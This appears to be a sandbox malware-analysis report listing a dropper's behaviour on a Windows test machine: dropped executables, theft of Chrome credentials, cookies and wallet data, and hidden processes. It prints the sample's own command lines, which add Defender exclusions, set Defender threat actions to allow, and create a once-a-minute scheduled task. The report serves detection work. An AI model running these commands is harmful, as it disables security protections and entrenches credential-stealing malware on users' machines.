Time & API	Arguments	Status	Return
GetDiskFreeSpaceExW May 31, 2024, 7:24 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 8666529792 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Explorer total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 31, 2024, 7:24 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 8654508032 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Explorer total_number_of_bytes: 0	1	1
GetDiskFreeSpaceExW May 31, 2024, 7:34 a.m.	total_number_of_free_bytes: 9678589952 free_bytes_available: 9678589952 root_path: C:\ total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceExW May 31, 2024, 7:34 a.m.	total_number_of_free_bytes: 9678585856 free_bytes_available: 9678585856 root_path: C:\ total_number_of_bytes: 34252779520	1	1

Checks for known Chinese AV sofware registry keys (4 events)

regkey	.*360Safe
regkey	.*rising
regkey	.*Kingsoft
regkey	.*JiangMin

Steals private information from local Internet browsers (29 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieaf
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\lockfile
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ebfidpplhabeedpnhjnobghokpiioolj
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\agoakfejjabomempkjlepdflaleeobhb
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghpilmjholiicaobfjdkefcogmgaabif
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjca
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mfgccjchihfkkindfppnaooecgfneiii
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fmblappgoiilbgafhjklehhfifbdocee
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Opera Software
registry	HKEY_CURRENT_USER\SOFTWARE\Opera Software

Looks up the external IP address (1 event)

domain

ipinfo.io

Creates executable files on the filesystem (50 out of 308 events)

file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\fr\deepscan\DsRes.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\QHVer.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\softmgr\SomAdvUtils.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\safemon\360procmon.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\safemon\QHActiveDefense.exe
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\deepscan\rmt.exe
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\HomeRouterMgr.exe
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\scanstub.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\safemon\disproc.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\softmgr\SML\SMLLauncher64.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\sites.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\netmon\netmstart.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\LeakFixHelper64.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\deepscan\BAPI.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\safemon\chromesafe64.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\safemon\libzdtp.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\I18N64.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\es\deepscan\DsRes64.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\QHSafeMain.exe
file	C:\Users\test22\AppData\Local\Temp\1000285001\FirstZ.exe
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\softmgr\SML\SMLHelper64.exe
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\safemon\360SPTool.exe
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\Safelive.dll
file	C:\Users\test22\AppData\Local\Temp\1000005001\fileosn.exe
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\softmgr\SomAdvUtilsWrap.dll
file	C:\Users\test22\AppData\Local\Temp\1000009001\swizzzz.exe
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\360 Security Center\360 Total Security\360 Total Security.lnk
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\safemon\svcMonitor.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\PDown.dll
file	C:\Users\test22\Pictures\mpVxwmaUWkvooa27wKUZd6Do.exe
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\deepscan\DsSysRepair.dll
file	C:\Users\Public\Desktop\360 Total Security.lnk
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\modules\360PatchMgr.exe
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\PatchUp.exe
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\LeakFixHelper64.exe
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\Utils\360WifiProtect.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\filemon\AVCheck.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\Utils\DesktopPlus\Utils\360ScreenCapture.exe
file	C:\Users\test22\AppData\Local\Temp\1000006001\lumma1234.exe
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\Utils\360DrvMgr\ScriptExecute.exe
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\softmgr\SML\SoftMgrLite.exe
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\scanbase.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\Repair.exe
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\360TSCommon64.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\de\deepscan\DsRes64.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\deepscan\qex\PHPEX.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\360Base64.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\deepscan\AVE\AVEngine.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\zh-CN\deepscan\DsRes64.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\CrashReport.dll

Creates hidden or system file (5 events)

Time & API	Arguments	Status	Return
NtCreateFile May 31, 2024, 7:29 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x00000000 filepath: C:\Users\test22\AppData\Roaming\Microsoft desired_access: 0x00100001 (FILE_READ_DATA\|FILE_LIST_DIRECTORY\|SYNCHRONIZE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft create_options: 16417 (FILE_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT\|FILE_OPEN_FOR_BACKUP_INTENT) status_info: 4294967295 () share_access: 3 (FILE_SHARE_READ\|FILE_SHARE_WRITE)		3221225525
NtCreateFile May 31, 2024, 7:29 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x00000000 filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto desired_access: 0x00100001 (FILE_READ_DATA\|FILE_LIST_DIRECTORY\|SYNCHRONIZE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto create_options: 16417 (FILE_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT\|FILE_OPEN_FOR_BACKUP_INTENT) status_info: 4294967295 () share_access: 3 (FILE_SHARE_READ\|FILE_SHARE_WRITE)		3221225525
NtCreateFile May 31, 2024, 7:29 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x00000000 filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA desired_access: 0x00100001 (FILE_READ_DATA\|FILE_LIST_DIRECTORY\|SYNCHRONIZE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA create_options: 16417 (FILE_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT\|FILE_OPEN_FOR_BACKUP_INTENT) status_info: 4294967295 () share_access: 3 (FILE_SHARE_READ\|FILE_SHARE_WRITE)		3221225525
NtCreateFile May 31, 2024, 7:29 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x00000000 filepath: C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3832866432-4053218753-3017428901-1001 desired_access: 0x00100001 (FILE_READ_DATA\|FILE_LIST_DIRECTORY\|SYNCHRONIZE) file_attributes: 4 (FILE_ATTRIBUTE_SYSTEM) filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3832866432-4053218753-3017428901-1001 create_options: 16417 (FILE_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT\|FILE_OPEN_FOR_BACKUP_INTENT) status_info: 4294967295 () share_access: 3 (FILE_SHARE_READ\|FILE_SHARE_WRITE)		3221225525
SetFileAttributesW May 31, 2024, 7:33 a.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\Windows\System32\GroupPolicy filepath: C:\Windows\System32\GroupPolicy	1	1

Creates a shortcut to an executable file (27 events)

file	C:\Users\test22\Desktop\360 Total Security.lnk
file	C:\Users\Public\Desktop\ゲームブースター.lnk
file	C:\Users\Public\Desktop\遊戲加速.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\360 Security Center\360 Total Security\Sandbox.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\360 Security Center\360 Total Security\360 Total Security.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Chrome.lnk
file	C:\Users\Public\Desktop\Desktop Plus.lnk
file	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file	C:\Users\Public\Desktop\360 Total Security.lnk
file	C:\Users\Public\Desktop\360安全衛士.lnk
file	C:\Users\Public\Desktop\Game Booster.lnk
file	C:\Users\Public\Desktop\Tăng tốc trò chơi.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\360 Security Center\360 Total Security\Patch Up.lnk
file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Explorer.lnk
file	C:\Users\Public\Desktop\Spiel-Booster.lnk
file	C:\Users\Public\Desktop\Acelerador de juegos.lnk
file	C:\Users\Public\Desktop\Aceleração de Jogos.lnk
file	C:\Users\Public\Desktop\游戏加速.lnk
file	C:\Users\Public\Desktop\桌面助手.lnk
file	C:\Users\Public\Desktop\Accelerazione Giochi.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk
file	C:\Users\Public\Desktop\Przyspieszacz gier.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Firefox.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\360 Security Center\360 Total Security\Uninstall.lnk
file	C:\Users\Public\Desktop\Ускорение игр.lnk
file	C:\Users\Public\Desktop\Oyun Hızlandırıcı.lnk

Creates a suspicious process (11 events)

cmdline	powershell start-process -WindowStyle Hidden gpupdate.exe /force
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\test22\AppData\Local\Temp\1000031001\Newoff.exe" /F
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\1000020001\file300un.exe" -Force
cmdline	cmd /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
cmdline	forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
cmdline	"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
cmdline	powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\1000020001\file300un.exe" -Force
cmdline	"C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\360\Total Security\MenuEx64.dll"
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\test22\AppData\Local\Temp\1000031001\Newoff.exe" /F
cmdline	forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
cmdline	/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

Drops a binary and executes it (11 events)

file	C:\Users\test22\AppData\Local\Temp\1b29d73536\axplont.exe
file	C:\Users\test22\AppData\Local\Temp\1000004001\33333.exe
file	C:\Users\test22\AppData\Local\Temp\1000005001\fileosn.exe
file	C:\Users\test22\AppData\Local\Temp\1000006001\lumma1234.exe
file	C:\Users\test22\AppData\Local\Temp\1000008001\gold.exe
file	C:\Users\test22\AppData\Local\Temp\1000009001\swizzzz.exe
file	C:\Users\test22\AppData\Local\Temp\1000020001\file300un.exe
file	C:\Users\test22\AppData\Local\Temp\1000031001\Newoff.exe
file	C:\Users\test22\AppData\Local\Temp\1000285001\FirstZ.exe
file	C:\Users\test22\Pictures\1Cp24GDX3JU3iT5NEvx8jPp9.exe
file	C:\Users\test22\Pictures\mpVxwmaUWkvooa27wKUZd6Do.exe

Drops an executable to the user AppData folder (50 out of 478 events)

file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\CrashReport.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\ToolBox.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\es\safemon\UDiskScanEngine.dll.locale
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\softmgr\commonbase.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\softmgr\SML\SMLLauncher.dll
file	C:\Users\test22\AppData\Local\Temp\1000008001\gold.exe
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\Utils\SimpleIME.exe
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\sweeper\SysSweeper.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\deepscan\AVE\360KPBase.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\de\deepscan\DsRes.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\ipc\360boxld.exe
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\ja\AntiAdwa.dll.locale
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\deepscan\QVM\360AQVM.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\ru\deepscan\DsRes.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\zh-TW\AntiAdwa.dll.locale
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\de\safemon\SelfProtectAPI2.dll.locale
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\pt\ipc\yhregd.dll.locale
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\zh-CN\safemon\webprotection_firefox\plugins\nptswp.dll.locale
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\hi\ipc\filemgr.dll.locale
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\zh-TW\UrlSettings.dll.locale
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\dynlenv.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\ipc\360AntiHacker.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\Utils\360DrvMgr\DrvmgrCore.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\safemon\gamemode.tpi
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\vi\safemon\SelfProtectAPI2.dll.locale
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\Utils\DesktopPlus\Utils\360ScreenCapture.exe
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\safemon\spsafe.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\en\deepscan\DsRes.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\zh-TW\deepscan\cloudsec3.dll.locale
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\fr\ipc\appd.dll.locale
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\ru\ipc\NetDefender.dll.locale
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\safemon\WDPayPro.exe
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\vi\safemon\chrome\360webshield.exe.locale
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\hi\safemon\chrome\360webshield.exe.locale
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\zh-CN\deepscan\DsRes.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\zh-TW\safemon\360SPTool.exe.locale
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\Utils\SiteUIProxy.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\netmon\netdrv\60\360netmon_60.sys
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\ru\AntiAdwa.dll.locale
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\QHSafeScanner.exe
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\FastAnimation.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\deepscan\qex\qex.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\safemon\UDiskScanEngine.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\deepscan\sbx.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\safemon\360calaInt.dll
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\zh-CN\AntiAdwa.dll.locale
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\pt\safemon\spsafe.dll.locale
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\ja\safemon\safemon.dll.locale
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\i18n\zh-TW\safemon\Safemon.dll.locale
file	C:\Users\test22\AppData\Local\Temp\360_install_20240531131406_20592046\temp_files\ipc\360hvm.dll

A process created a hidden window (22 events)

Time & API	Arguments	Status	Return
ShellExecuteExW May 31, 2024, 7:29 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1b29d73536\axplont.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1b29d73536\axplont.exe	1	1
ShellExecuteExW May 31, 2024, 7:29 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000004001\33333.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000004001\33333.exe	1	1
ShellExecuteExW May 31, 2024, 7:29 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000005001\fileosn.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000005001\fileosn.exe	1	1
ShellExecuteExW May 31, 2024, 7:29 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000006001\lumma1234.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000006001\lumma1234.exe	1	1
ShellExecuteExW May 31, 2024, 7:29 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000008001\gold.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000008001\gold.exe	1	1
ShellExecuteExW May 31, 2024, 7:29 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000009001\swizzzz.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000009001\swizzzz.exe	1	1
ShellExecuteExW May 31, 2024, 7:29 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000020001\file300un.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000020001\file300un.exe	1	1
ShellExecuteExW May 31, 2024, 7:30 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000031001\Newoff.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000031001\Newoff.exe	1	1
ShellExecuteExW May 31, 2024, 7:33 a.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\1000020001\file300un.exe" -Force filepath: powershell	1	1
ShellExecuteExW May 31, 2024, 7:33 a.m.	show_type: 0 filepath_r: SCHTASKS parameters: /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\test22\AppData\Local\Temp\1000031001\Newoff.exe" /F filepath: SCHTASKS	1	1
ShellExecuteExW May 31, 2024, 7:33 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000285001\FirstZ.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000285001\FirstZ.exe	1	1
ShellExecuteExW May 31, 2024, 7:33 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures\jGEiEpLYpr5RFIasrd4jJg3X.exe parameters: filepath: C:\Users\test22\Pictures\jGEiEpLYpr5RFIasrd4jJg3X.exe		0
ShellExecuteExW May 31, 2024, 7:33 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures\1Cp24GDX3JU3iT5NEvx8jPp9.exe parameters: /s filepath: C:\Users\test22\Pictures\1Cp24GDX3JU3iT5NEvx8jPp9.exe	1	1
ShellExecuteExW May 31, 2024, 7:33 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures\mpVxwmaUWkvooa27wKUZd6Do.exe parameters: filepath: C:\Users\test22\Pictures\mpVxwmaUWkvooa27wKUZd6Do.exe	1	1
ShellExecuteExW May 31, 2024, 7:34 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures\VjKwGjaJtKztciMR3QUC8xCl.exe parameters: filepath: C:\Users\test22\Pictures\VjKwGjaJtKztciMR3QUC8xCl.exe	1	1
ShellExecuteExW May 31, 2024, 7:35 a.m.	show_type: 0 filepath_r: C:\Program Files (x86)\360\Total Security\Utils\PowerSaver.exe parameters: /flightsigning filepath: C:\Program Files (x86)\360\Total Security\Utils\PowerSaver.exe	1	1
